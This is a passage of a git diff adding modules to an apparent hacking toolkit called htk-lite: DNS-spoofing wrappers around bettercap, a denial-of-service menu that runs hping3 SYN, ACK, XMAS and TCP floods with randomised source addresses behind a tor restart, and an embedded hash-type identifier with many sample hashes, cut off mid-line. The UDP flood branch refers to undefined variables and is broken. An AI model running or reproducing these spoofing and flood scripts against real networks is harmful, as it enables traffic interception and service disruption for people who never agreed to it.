+def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + +dnsspoofall() diff --git a/htk-lite/commandlist/dnsspoof.py b/htk-lite/commandlist/dnsspoof.py new file mode 100644 index 0000000..9b81c4f --- /dev/null +++ b/htk-lite/commandlist/dnsspoof.py @@ -0,0 +1,53 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +dnsspoof() diff --git a/htk-lite/commandlist/dos.py b/htk-lite/commandlist/dos.py new file mode 100644 index 0000000..f6fca63 --- /dev/null +++ b/htk-lite/commandlist/dos.py @@ -0,0 +1,87 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socket +import socks +import requests +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def dos(): + print """ +{0}tcp: * tcp target port +{1}udp: * udp target port +{2}syn: * syn target port +{3}ack: * ack target port +{4}xmas: * xmas target port +\033[0m +!Press CTRL C to stop attacking! + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + command, target, port = raw_input("Method: ").split() + if command == "tcp": + os.system("service tor restart") + os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "udp": + try: + ip = socket.gethostbyname(target) + port = int(port) + os.system("service tor restart") + sent = 0 + while True: + print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + if port == 65534: + port = 1 + except: + print "\nUDP flood stopped\n" + os.system("") + if command == "syn": + os.system("service tor restart") + os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "ack": + os.system("service tor restart") + os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "xmas": + os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + except: + print "\n\033[91mError: Not Enough Arguments\033[0m\n " + +dos() diff --git a/htk-lite/commandlist/exit.py b/htk-lite/commandlist/exit.py new file mode 100644 index 0000000..38ab1bc --- /dev/null +++ b/htk-lite/commandlist/exit.py @@ -0,0 +1,2 @@ +import sys +sys.exit() diff --git a/htk-lite/commandlist/hashid.py b/htk-lite/commandlist/hashid.py new file mode 100644 index 0000000..8ccc5a2 --- /dev/null +++ b/htk-lite/commandlist/hashid.py @@ -0,0 +1,619 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 